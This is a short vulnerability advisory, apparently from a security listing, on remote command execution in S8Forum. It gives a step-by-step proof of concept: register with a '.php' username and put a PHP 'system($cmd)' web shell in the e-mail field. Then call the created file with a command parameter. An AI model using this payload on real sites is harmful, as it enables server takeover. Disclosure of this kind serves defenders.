|
|
S8Forum Remote Command Execution Vulnerability
The following example was submitted: - go to Register - insert in Username: any_name.php - in password : any_pasword. - in E-Mail: <? system($cmd); ?> Then request the following page: http://www.example.com/s8forumfolder/users/any_name.php?cmd=uname%20-a |
|
Privacy Statement |